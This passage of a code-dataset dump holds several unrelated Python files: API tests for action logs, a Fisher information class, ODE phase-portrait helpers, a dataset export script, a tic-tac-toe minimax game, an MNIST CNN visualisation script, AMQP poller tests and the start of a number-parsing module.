\"actor_id\": \"\",\n \"action_group\": \"cluster_changes\",\n \"action_name\": \"deployment\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n # about 1/3 is incomplete\n \"end_timestamp\": \"2\" if i % 3 else None,\n \"additional_info\": {\n \"parent_task_id\": i if i % 2 else None,\n \"subtasks_ids\": [],\n \"operation\": \"deployment\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5\n }\n }\n for i in xrange(100)]\n completed_count = sum(rec[\"body\"][\"end_timestamp\"] is not None\n for rec in action_logs)\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n\n log_recs = db.session.query(ActionLog).filter(\n ActionLog.master_node_uid == master_node_uid)\n self.assertEqual(\n log_recs.count(),\n completed_count\n )\n for rec in log_recs:\n self.assertIsNotNone(rec.body[\"end_timestamp\"])\n\n resp_logs = json.loads(resp.data)['action_logs']\n self.assertEqual(\n len(resp_logs),\n len(action_logs)\n )\n passed = sum(r['status'] == consts.ACTION_LOG_STATUSES.added\n for r in resp_logs)\n skipped = sum(r['status'] == consts.ACTION_LOG_STATUSES.skipped\n for r in resp_logs)\n self.assertEqual(\n passed + skipped,\n len(action_logs)\n )\n self.assertEqual(\n passed,\n completed_count\n )\n\n def test_failed_action_logs(self):\n al_num = 100\n action_logs = [\n {\n 'master_node_uid': 'xx',\n 'external_id': i,\n 'body': {\n \"id\": i,\n \"actor_id\": \"\",\n \"action_group\": \"cluster_changes\",\n \"action_name\": \"deployment\",\n \"action_type\": \"nailgun_task\",\n \"start_timestamp\": \"1\",\n \"end_timestamp\": \"2\",\n \"additional_info\": {\n \"parent_task_id\": None,\n \"subtasks_ids\": [],\n \"operation\": \"deployment\"\n },\n \"is_sent\": False,\n \"cluster_id\": 5\n }\n }\n for i in xrange(al_num)]\n with patch.object(ActionLog.__table__, 'insert',\n side_effect=Exception('stop')):\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs}\n )\n self.check_response_ok(resp)\n\n resp_logs = json.loads(resp.data)['action_logs']\n for r in resp_logs:\n self.assertEqual(consts.ACTION_LOG_STATUSES.failed,\n r['status'])\n\n def test_action_type_action_name_copied_to_columns(self):\n action_logs_data = [\n {\n 'master_node_uid': 'xx',\n 'external_id': 1,\n 'body': {\n 'id': 1,\n 'action_name': 'deployment',\n 'action_type': 'nailgun_task',\n 'end_timestamp': None\n }\n },\n {\n 'master_node_uid': 'xx',\n 'external_id': 2,\n 'body': {\n 'id': 2,\n 'action_name': '',\n 'action_type': 'http_request',\n 'end_timestamp': \"1\"\n }\n }\n ]\n resp = self.post(\n '/api/v1/action_logs/',\n {'action_logs': action_logs_data}\n )\n self.check_response_ok(resp)\n\n action_logs = db.session.query(ActionLog).all()\n for action_log in action_logs:\n self.assertEqual(action_log.action_name,\n action_log.body['action_name'])\n self.assertEqual(action_log.action_type,\n action_log.body['action_type'])\n","sub_path":"collector/collector/test/resources/test_action_logs.py","file_name":"test_action_logs.py","file_ext":"py","file_size_in_byte":11202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"339117277","text":"import numpy as np\nimport qiskit as qk\nfrom copy import deepcopy\nfrom tqdm.notebook import tqdm\nfrom neuralnetwork import *\nfrom utils import *\n\n\nclass FIM():\n def __init__(self, model):\n self.model = model\n self.fim = None\n\n def fit(self, x):\n n_samples = x.shape[0]\n\n self.model.backward(x, samplewise=True, include_loss=False)\n gradient = self.model.weight_gradient_list\n\n gradient_flattened = []\n for grad in gradient:\n gradient_flattened.append(grad.reshape(n_samples, -1))\n\n gradient_flattened = np.concatenate(gradient_flattened, axis=1)\n\n self.fim = 1 / n_samples * gradient_flattened.T @ gradient_flattened\n\n def eigen(self, sort=False):\n self.eigen = np.linalg.eig(self.fim)[0]\n if sort:\n self.eigen[::-1].sort()\n return np.abs(self.eigen)\n\n def fisher_rao(self):\n weight = self.model.weight\n\n weight_flattened = []\n for w in weight:\n weight_flattened.append(w.reshape(-1, 1))\n\n weight = np.concatenate(weight_flattened, axis=0)\n\n fr = weight.T @ self.fim @ weight\n\n return fr[0][0]\n\n\ndef trajectory_length(x):\n diff = (x[1:] - x[:-1])\n diff = np.append(diff, (x[0] - x[-1]).reshape(1, -1), axis=0)\n accum = np.sum(diff**2, axis=1)\n accum = np.sum(np.sqrt(accum))\n return accum\n\n\ndef trajectory_curvature(x):\n diff = (x[1:] - x[:-1])\n dot = np.matmul()\n accum = np.sum(diff**2, axis=1)\n accum = np.sum(np.sqrt(accum))\n return accum\n","sub_path":"src/analysis.py","file_name":"analysis.py","file_ext":"py","file_size_in_byte":1543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"141938848","text":"from collections import namedtuple\n\nimport numpy as np\nfrom scipy.integrate import ode\n\nfrom helpers import pairwise\n\nArrow = namedtuple('Arrow', ['x', 'y', 'len_x', 'len_y'])\n\n\ndef get_plot_arrows(xs, ys, n=3):\n length = 0\n for (prev_x, prev_y), (x, y) in pairwise(zip(xs, ys)):\n length += np.sqrt((x - prev_x) ** 2 + (y - prev_y) ** 2)\n distance, i, arrows = 0, 1, []\n for (prev_x, prev_y), (x, y) in pairwise(zip(xs, ys)):\n distance += np.sqrt((x - prev_x) ** 2 + (y - prev_y) ** 2)\n if distance > i * length / n:\n arrows.append(Arrow(prev_x, prev_y, x - prev_x, y - prev_y))\n i += 1\n return arrows\n\n\ndef trajectory(x0, derivative, bounds=lambda x: True, time=100, reverse=False):\n solver = ode(derivative).set_integrator('zvode', method='bdf')\n solver.set_initial_value(x0, 0)\n dt, points = 0.01, [x0]\n while solver.successful() and abs(solver.t) < time:\n point = solver.integrate(solver.t + dt if not reverse else solver.t - dt)\n points.append(np.real(point))\n if not bounds(point):\n break\n if reverse:\n points.reverse()\n return points\n","sub_path":"TS/lapunow2/phase_portraits.py","file_name":"phase_portraits.py","file_ext":"py","file_size_in_byte":1156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228412118","text":"# -*- coding: utf-8 -*-\n'''\nГенерация датасета и сохранение его в файлах, чтобы запускать модели, написанные на других ЯП.\n(c) Козиев Илья inkoziev@gmail.com\n'''\n\nfrom __future__ import print_function\nimport sklearn.model_selection\nimport numpy as np\nfrom DatasetVectorizers import W2V_Vectorizer\nfrom DatasetVectorizers import WordIndeces_Vectorizer\n\n\n\ndataset_generator = W2V_Vectorizer()\n#dataset_generator = WordIndeces_Vectorizer()\nX_data,y_data = dataset_generator.vectorize_dataset()\n\nX_train, X_val0, y_train, y_val0 = sklearn.model_selection.train_test_split(X_data, y_data, test_size=0.66,\n random_state=123456)\n\nX_holdout, X_val, y_holdout, y_val = sklearn.model_selection.train_test_split(X_val0, y_val0, test_size=0.50,\n random_state=123456)\n\nprint('X_train.shape={} X_val.shape={} X_holdout.shape={}'.format(X_train.shape, X_val.shape, X_holdout.shape))\n\n\n# --------------------------------------------------------------------\n# Датасеты для OpenNN, в которых X и y совмещены в одном файле\nnx = X_train.shape[1]\nnrow = 10000000\nx_header = str.join( '\\t', [ 'x{}'.format(i) for i in range(nx) ] )+'\\ty'\nXy_train = np.hstack( (X_train, y_train.reshape( (y_train.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_train.csv', Xy_train, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_train.csv', Xy_train, fmt='%g', delimiter='\\t', header='', comments='')\n\nXy_val = np.hstack( (X_val, y_val.reshape( (y_val.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_val.csv', Xy_val, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_val.csv', Xy_val, fmt='%g', delimiter='\\t', header='', comments='')\n\nXy_holdout = np.hstack( (X_holdout, y_holdout.reshape( (y_holdout.shape[0],1) ) ) )[:nrow,:]\n#np.savetxt( '../data/Xy_holdout.csv', Xy_holdout, fmt='%.18e', delimiter='\\t', header=x_header, comments='')\nnp.savetxt( '../data/Xy_holdout.csv', Xy_holdout, fmt='%g', delimiter='\\t', header='', comments='')\n\n# --------------------------------------------------------------------\n\nnp.savetxt( '../data/X_train.csv', X_train, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_train.csv', y_train, fmt='%.18e', delimiter='\\t')\n\nnp.savetxt( '../data/X_val.csv', X_val, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_val.csv', y_val, fmt='%.18e', delimiter='\\t')\n\nnp.savetxt( '../data/X_holdout.csv', X_holdout, fmt='%.18e', delimiter='\\t')\nnp.savetxt( '../data/y_holdout.csv', y_holdout, fmt='%.18e', delimiter='\\t')\n","sub_path":"PyModels/store_dataset_file.py","file_name":"store_dataset_file.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230159874","text":"# pylint: disable=missing-module-docstring\r\n# pylint: disable=missing-class-docstring\r\n# pylint: disable=missing-function-docstring\r\nBOT = 'O'\r\nHUMAN = 'X'\r\nBLANK = ' '\r\n\r\n\r\ndef d2_to_number(num_a, num_b):\r\n result = 999\r\n if num_a == 0 and num_b == 0:\r\n result = 1\r\n elif num_a == 0 and num_b == 1:\r\n result = 2\r\n elif num_a == 0 and num_b == 2:\r\n result = 3\r\n elif num_a == 1 and num_b == 0:\r\n result = 4\r\n elif num_a == 1 and num_b == 1:\r\n result = 5\r\n elif num_a == 1 and num_b == 2:\r\n result = 6\r\n elif num_a == 2 and num_b == 0:\r\n result = 7\r\n elif num_a == 2 and num_b == 1:\r\n result = 8\r\n elif num_a == 2 and num_b == 2:\r\n result = 9\r\n\r\n return result\r\n\r\n\r\ndef display_board(d2_board):\r\n blank_board = \"\"\"\r\n___________________\r\n| 1 | 2 | 3 |\r\n|-----------------|\r\n| 4 | 5 | 6 |\r\n|-----------------|\r\n| 7 | 8 | 9 |\r\n|-----------------|\r\n\"\"\"\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n pos_number = d2_to_number(pos_x, pos_y)\r\n if d2_board[pos_x][pos_y] == 'O' or d2_board[pos_x][pos_y] == 'X':\r\n blank_board = blank_board.replace(str(pos_number), d2_board[pos_x][pos_y])\r\n else:\r\n blank_board = blank_board.replace(str(pos_number), ' ')\r\n print(blank_board)\r\n\r\n\r\ndef number_y(num_c):\r\n result = 99\r\n if num_c % 3 == 1:\r\n result = 0\r\n if num_c % 3 == 2:\r\n result = 1\r\n if num_c % 3 == 0:\r\n result = 2\r\n return result\r\n\r\n\r\ndef number_x(num_c):\r\n if num_c <= 3:\r\n return 0\r\n if num_c >= 7:\r\n return 2\r\n return 1\r\n\r\n\r\ndef player_input(correct_fields):\r\n while True:\r\n print(\"dostepne pola: \")\r\n print(correct_fields)\r\n try:\r\n console_input = input(\"Wprowadź numer pola: \")\r\n console_input = int(console_input)\r\n if console_input not in correct_fields:\r\n print(correct_fields)\r\n print(\"Błędny numer pola, ponów próbę\")\r\n else:\r\n break\r\n except ValueError:\r\n print(correct_fields)\r\n print(\"Podaj pole jako numer pola, ponów próbę\")\r\n return console_input\r\n\r\n\r\ndef computer_turn():\r\n best_score = -1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n # u can move here\r\n d2Board[pos_x][pos_y] = BOT\r\n score = min_max_algorithm(d2Board, False)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score > best_score:\r\n best_score = score\r\n best_move_x = pos_x\r\n best_move_y = pos_y\r\n d2Board[best_move_x][best_move_y] = BOT\r\n\r\n\r\ndef trying_max():\r\n best_score = -1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n d2Board[pos_x][pos_y] = BOT\r\n score = min_max_algorithm(d2Board, False)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score > best_score:\r\n best_score = score\r\n return best_score\r\n\r\n\r\ndef trying_min():\r\n best_score = 1000\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2Board[pos_x][pos_y] == BLANK:\r\n d2Board[pos_x][pos_y] = HUMAN\r\n score = min_max_algorithm(d2Board, True)\r\n d2Board[pos_x][pos_y] = BLANK\r\n if score < best_score:\r\n best_score = score\r\n return best_score\r\n\r\n\r\ndef min_max_algorithm(board, is_maximazing):\r\n result = 999\r\n if if_mark_won(BOT):\r\n result = 100\r\n elif if_mark_won(HUMAN):\r\n result = -100\r\n elif check_draw(board):\r\n result = 0\r\n elif is_maximazing:\r\n result = trying_max()\r\n # best_score = -1000\r\n # for pos_x in range(0, 3):\r\n # for pos_y in range(0, 3):\r\n # if d2Board[pos_x][pos_y] == BLANK:\r\n # d2Board[pos_x][pos_y] = BOT\r\n # score = min_max_algorithm(board, False)\r\n # d2Board[pos_x][pos_y] = BLANK\r\n # if score > best_score:\r\n # best_score = score\r\n # result = best_score\r\n # minimizing\r\n elif not is_maximazing:\r\n result = trying_min()\r\n # best_score = 1000\r\n # for pos_x in range(0, 3):\r\n # for pos_y in range(0, 3):\r\n # if d2Board[pos_x][pos_y] == BLANK:\r\n # d2Board[pos_x][pos_y] = HUMAN\r\n # score = min_max_algorithm(board, True)\r\n # d2Board[pos_x][pos_y] = BLANK\r\n # if score < best_score:\r\n # best_score = score\r\n #result = best_score\r\n return result\r\n\r\n\r\ndef check_draw(d2_board):\r\n for pos_x in range(0, 3):\r\n for pos_y in range(0, 3):\r\n if d2_board[pos_x][pos_y] == BLANK:\r\n return False\r\n return True\r\n\r\n\r\ndef if_mark_won(mark):\r\n symbol = 'X'\r\n for pos_x in range(0, 3):\r\n # sprwadz piony\r\n if d2Board[pos_x][0] == d2Board[pos_x][1] and d2Board[pos_x][1] == d2Board[pos_x][2]:\r\n symbol = d2Board[pos_x][0]\r\n if symbol == mark:\r\n return True\r\n # sprawdz poziomy\r\n if d2Board[0][pos_x] == d2Board[1][pos_x] and d2Board[1][pos_x] == d2Board[2][pos_x]:\r\n symbol = d2Board[0][pos_x]\r\n if symbol == mark:\r\n return True\r\n # sprawdz skosy\r\n if d2Board[0][0] == d2Board[1][1] and d2Board[1][1] == d2Board[2][2]:\r\n symbol = d2Board[0][0]\r\n if symbol == mark:\r\n return True\r\n if d2Board[2][0] == d2Board[1][1] and d2Board[1][1] == d2Board[0][2]:\r\n symbol = d2Board[2][0]\r\n if symbol == mark:\r\n return True\r\n return False\r\n\r\n\r\ndef check_end(d2_board):\r\n # sprwadz\r\n symbol = 'X'\r\n for pos_x in range(0, 3):\r\n # sprwadz piony\r\n if d2_board[pos_x][0] == d2_board[pos_x][1] and d2_board[pos_x][1] == d2_board[pos_x][2]:\r\n symbol = d2_board[pos_x][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał1 ' + str(symbol))\r\n return True\r\n # sprawdz poziomy\r\n if d2_board[0][pos_x] == d2_board[1][pos_x] and d2_board[1][pos_x] == d2_board[2][pos_x]:\r\n symbol = d2_board[0][pos_x]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał2 ' + str(symbol))\r\n return True\r\n # sprawdz skosy\r\n if d2_board[0][0] == d2_board[1][1] and d2_board[1][1] == d2_board[2][2]:\r\n symbol = d2_board[0][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał3 ' + str(symbol))\r\n return True\r\n if d2_board[2][0] == d2_board[1][1] and d2_board[1][1] == d2_board[0][2]:\r\n symbol = d2_board[2][0]\r\n if symbol in ('O', 'X'):\r\n print('Wygrał4 ' + str(symbol))\r\n return True\r\n return False\r\n\r\n\r\ndef basic_game_turn(player_turn, d2_board):\r\n if player_turn:\r\n print('Gracz X')\r\n choice = player_input(able_fields)\r\n d2_board[number_x(choice)][number_y(choice)] = 'X'\r\n else:\r\n print('Komputer O')\r\n # odkomentuj ponizsze dla 2ch graczy\r\n # choice = playerInput(avaibleFields)\r\n # d2Board[numberX(choice)][numberY(choice)] = 'O'\r\n computer_turn()\r\n\r\n list_of_globals = globals()\r\n list_of_globals['PLAYER_TURN'] = not list_of_globals['PLAYER_TURN']\r\n\r\n\r\nif __name__ == '__main__':\r\n w, h = 3, 3\r\n d2Board = [[7 for x in range(w)] for y in range(h)]\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n d2Board[i][j] = BLANK\r\n\r\n display_board(d2Board)\r\n PLAYER_TURN = True\r\n while True:\r\n able_fields = []\r\n for i in range(0, 3):\r\n for j in range(0, 3):\r\n POS_NUMBER = d2_to_number(i, j)\r\n if not (d2Board[i][j] == 'O' or d2Board[i][j] == 'X'):\r\n # jeśli nie ma zajętego pola, możesz je zająć\r\n able_fields.append(POS_NUMBER)\r\n if if_mark_won(HUMAN):\r\n print(\"Wygrał gracz, X\")\r\n break\r\n if if_mark_won(BOT):\r\n print(\"Wygrał komputer, X\")\r\n break\r\n if len(able_fields) <= 0:\r\n print(\"End of the game\")\r\n if if_mark_won(HUMAN):\r\n print(\"Wygrał gracz, X\")\r\n break\r\n if if_mark_won(BOT):\r\n print(\"Wygrał komputer, X\")\r\n break\r\n print(\"Remis\")\r\n break\r\n basic_game_turn(PLAYER_TURN, d2Board)\r\n display_board(d2Board)\r\n # print(d2Board)\r\n","sub_path":"lab5tictacGame/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"539264779","text":"from __future__ import print_function\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport matplotlib.pyplot as plt\nfrom torchvision import datasets, transforms\nfrom sklearn.manifold import TSNE\n\n\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n\n self.conv1 = nn.Conv2d(in_channels=1, out_channels=64, kernel_size=(5, 5), stride=1)\n self.conv2 = nn.Conv2d(64, 64, 3, 1)\n self.conv3 = nn.Conv2d(64, 128, 3, 1)\n self.bn1 = nn.BatchNorm2d(64)\n self.bn2 = nn.BatchNorm2d(64)\n self.bn3 = nn.BatchNorm2d(128)\n self.dropout1 = nn.Dropout2d(0.4)\n self.dropout2 = nn.Dropout2d(0.3)\n self.dropout3 = nn.Dropout2d(0.2)\n self.fc1 = nn.Linear(128 * 9, 256)\n self.fc2 = nn.Linear(256, 10)\n\n\n def forward(self, x, get_features=True):\n x = self.conv1(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout1(self.bn1(x))\n\n x = self.conv2(x)\n x = F.relu(x)\n x = F.max_pool2d(x, 2)\n x = self.dropout2(self.bn2(x))\n\n x = self.conv3(x)\n x = F.relu(x)\n x = self.dropout3(self.bn3(x))\n\n x = torch.flatten(x, 1)\n feat = self.fc1(x)\n\n x = F.relu(feat)\n x = self.fc2(x)\n\n output = F.log_softmax(x, dim=1)\n return output, feat\n\n\nif __name__ == '__main__':\n model = Net()\n model.load_state_dict(torch.load('mnist_model_full.pt'))\n\n test_dataset = datasets.MNIST('../data', train=False,\n transform=transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize((0.1307,), (0.3081,))\n ]))\n\n with torch.no_grad(): # For the inference step, gradient is not computed\n mistake_ims = []\n mistakes = []\n model.eval()\n kernels = list(model.children())[0].weight.data[:9, 0]\n confusion = np.zeros((10, 10))\n class_counts = np.zeros(10)\n features = np.zeros((len(test_dataset), 256))\n targets = []\n i = 0\n\n for data, target in test_dataset:\n targets.append(target)\n output, features[i] = model(data.unsqueeze(0))\n pred = int(output.argmax(dim=1, keepdim=True)[0])\n\n if pred != target and len(mistakes) < 9:\n mistake_ims.append(data[0])\n mistakes.append((pred, target))\n\n confusion[target, pred] += 1\n class_counts[target] += 1\n i += 1\n\n #feats_embedded = TSNE(n_components=2).fit_transform(features)\n\n n_train = [60000 // (2 ** i) for i in [0, 1, 2, 3, 4]]\n train_accs = [99.43, 99.40, 99.28, 99.23, 99.]\n test_accs = [99.5, 99.44, 99.25, 99.19, 98.65]\n plt.figure(figsize=(8, 4))\n plt.loglog(n_train, 1 - np.array(train_accs) / 100., label='train')\n plt.loglog(n_train, 1 - np.array(test_accs) / 100., label='test')\n plt.xlabel('number of training examples')\n plt.ylabel('zero-one error')\n plt.xticks(n_train, n_train)\n plt.yticks([0.005, 0.01, 0.015])\n plt.legend()\n plt.savefig('subset_training.png')\n plt.close()\n\n fig, axs = plt.subplots(3, 3)\n for i, im in enumerate(mistake_ims):\n axs[i // 3, i % 3].imshow(im, cmap='gray')\n axs[i // 3, i % 3].axis('off')\n axs[i // 3, i % 3].set_title(f'Pred: {mistakes[i][0]}, Actual: {mistakes[i][1]}')\n plt.savefig('mistake_examples.png')\n plt.close()\n\n fig, axs = plt.subplots(3, 3)\n for i, im in enumerate(kernels):\n axs[i // 3, i % 3].imshow(im, cmap='gray')\n axs[i // 3, i % 3].axis('off')\n axs[i // 3, i % 3].set_title(f'Kernel {i + 1}')\n plt.savefig('first_layer_kernels.png')\n plt.close()\n\n confusion = [[('%d' % p) for p in row] for row in confusion]\n fig, axs = plt.subplots(1, 1)\n axs.table(cellText=confusion, cellLoc='center', loc='center')\n axs.axis('off')\n axs.set_ylabel('True Class')\n axs.set_title('Predicted Class')\n plt.savefig('confusion_matrix.png')\n plt.close()\n\n plt.figure(figsize=(8, 8))\n colors = ['tab:blue', 'tab:orange', 'tab:green', 'tab:red', 'tab:purple',\n 'tab:brown', 'tab:pink', 'tab:gray', 'tab:olive', 'tab:cyan']\n for i, c in enumerate(colors):\n fes = feats_embedded[np.where(np.array(targets) == i)]\n plt.scatter(fes[:, 0], fes[:, 1], color=colors[i], s=1, label=str(i))\n plt.legend()\n plt.savefig('tSNE.png')\n plt.close()\n\n plt.rcParams[\"font.family\"] = \"serif\"\n fig, axs = plt.subplots(4, 9)\n idxs = np.random.choice(len(test_dataset), size=4, replace=False)\n for i, idx in enumerate(idxs):\n sq_dists = np.sum((feats_embedded - feats_embedded[idx]) ** 2, axis=1)\n neighbors = np.argsort(sq_dists)[1:9]\n axs[i, 0].imshow(test_dataset[idx][0][0], cmap='gray')\n axs[i, 0].axis('off')\n for j in range(8):\n axs[i, j + 1].imshow(test_dataset[neighbors[j]][0][0], cmap='gray')\n axs[i, j + 1].axis('off')\n axs[0, 0].set_title('I_0')\n for j in range(1, 9):\n axs[0, j].set_title('I_' + str(j))\n plt.savefig('neighbors.png')\n plt.close()\n","sub_path":"visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":5495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"460625903","text":"from config.amqp import *\nfrom config.settings import *\nfrom modules.amqp import Worker\nfrom modules.logger import Log\nfrom on_http import NodesApi as Nodes\nfrom on_http import PollersApi as Pollers\nfrom threading import Thread\nfrom datetime import datetime\nfrom proboscis.asserts import assert_equal\nfrom proboscis.asserts import assert_not_equal\nfrom proboscis.asserts import assert_false\nfrom proboscis.asserts import assert_raises\nfrom proboscis.asserts import assert_true\nfrom proboscis.asserts import assert_is_not_none\nfrom proboscis import SkipTest\nfrom proboscis import test\nfrom json import dumps,loads\n\nLOG = Log(__name__)\n\n@test(groups=['amqp.tests'])\nclass AMQPTests(object):\n\n def __init__(self):\n self.__client = config.api_client\n self.__threadTasks = []\n\n class ThreadTask(object):\n def __init__(self,worker,thread,id):\n self.id = id\n self.worker = worker\n self.thread = thread\n self.state = False\n\n def amqp_tasker_thread(self,worker,id):\n LOG.info('spawning AMQP task thread for id {0}'.format(id))\n worker.start()\n\n def amqp_tasker_loop(self):\n completion = 0\n while completion < len(self.__threadTasks):\n for t in self.__threadTasks:\n if t.state is False:\n LOG.info('shutting down worker thread for id {0}'.format(t.id))\n t.thread.join()\n completion += 1\n\n @test(groups=['amqp.tests.sel'],depends_on_groups=['check-obm'])\n def check_sel_task(self):\n \"\"\" Testing AMQP on.task.ipmi.sel.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_SEL_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n self.amqp_tasker_loop()\n\n @test(groups=['amqp.tests.sdr'],depends_on_groups=['check-obm', 'amqp.tests.sel'])\n def check_sdr_task(self):\n \"\"\" Testing AMQP on.task.ipmi.sdr.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_SDR_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n self.amqp_tasker_loop()\n\n @test(groups=['amqp.tests.chassis'],depends_on_groups=['check-obm', 'amqp.tests.sdr'])\n def check_chassis_task(self):\n \"\"\" Testing AMQP on.task.ipmi.chassis.result \"\"\"\n Nodes().api1_1_nodes_get()\n nodes = loads(self.__client.last_response.data)\n self.__threadTasks = []\n for node in nodes:\n id = node.get('id')\n assert_not_equal(id,None)\n type = node.get('type')\n assert_not_equal(type,None)\n if type == 'compute':\n worker = Worker(queue=QUEUE_CHASSIS_RESULT, callbacks=[self.handle_result])\n thread = Thread(target=self.amqp_tasker_thread,args=(worker,id,))\n thread.daemon = True\n self.__threadTasks.append(self.ThreadTask(worker,thread,id))\n for t in self.__threadTasks:\n t.thread.start()\n t.state = True\n self.amqp_tasker_loop()\n\n def handle_result(self,body,message):\n LOG.debug(body,json=True)\n assert_is_not_none(body)\n assert_is_not_none(message)\n id = body['value'].get('node')\n assert_not_equal(id,None)\n for t in self.__threadTasks:\n if t.id == id:\n workId = body['value'].get('workItemId')\n assert_not_equal(workId,None)\n Pollers().api1_1_pollers_identifier_get(workId)\n poller = loads(self.__client.last_response.data)\n config = poller.get('config')\n assert_not_equal(config,None)\n command = config.get('command')\n assert_not_equal(command,None)\n LOG.info('Received message (nodeId={0}, workId={1}, command={2})'.format(id,workId,command))\n message.ack()\n LOG.info('stopping AMQP worker for id {0}'.format(id))\n t.worker.stop()\n t.state = False\n\n","sub_path":"test/tests/amqp_tests.py","file_name":"amqp_tests.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"523901738","text":"'''\n$Id: number.py 1.24 2009/02/10 23:19:16 donp Exp $\n\nCopyright (c) 2009, Don Peterson\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\n* Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n* Redistributions in binary form must reproduce the above\n copyright notice, this list of conditions and the following\n disclaimer in the documentation and/or other materials provided\n with the distribution.\n* Neither the name of the nor the names of its\n contributors may be used to endorse or promote products derived\n from this software without specific prior written permission.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT\nOWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,\nDATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY\nTHEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT\n(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n'''\n\nimport re\nfrom mpmath import mpf, mpc, mpi, inf\nfrom rational import Rational\nfrom integer import Zn, isint\nfrom julian import Julian\nfrom string import strip\nfrom si import suffixes_ln\n\ntry: from pdb import xx\nexcept: pass\n\n# Number recognition regular expressions\ninteger = re.compile(\"^[+-]?\\d+$\")\n\ncre=r'''\n %s # Match at beginning\n ([+-])%s # Optional leading sign\n %s # Placeholder for imaginary unit\n (\\d+\\.\\d+|\\d+\\.?|\\.\\d+) # Required digits and opt. decimal point\n (e[+-]?\\d+)? # Optional exponent\n %s # Match at end\n'''\n# Pure imaginary, xi or ix\nI1 = cre % (\"^\", \"?\", \"\", \"i$\")\nI2 = cre % (\"^\", \"?\", \"i\", \"$\")\n\n# Reals\nR = cre % (\"^\", \"?\", \"\", \"$\")\n\n# True complex numbers: x+iy or x+yi\nC1 = (cre % (\"^\", \"?\", \"\", \"\")) + (cre % (\"\", \"\", \"\", \"[ij]$\"))\nC2 = (cre % (\"^\", \"?\", \"\", \"\")) + (cre % (\"\", \"\", \"[ij]\", \"$\"))\n\n# Degenerate complex numbers: 1-i, 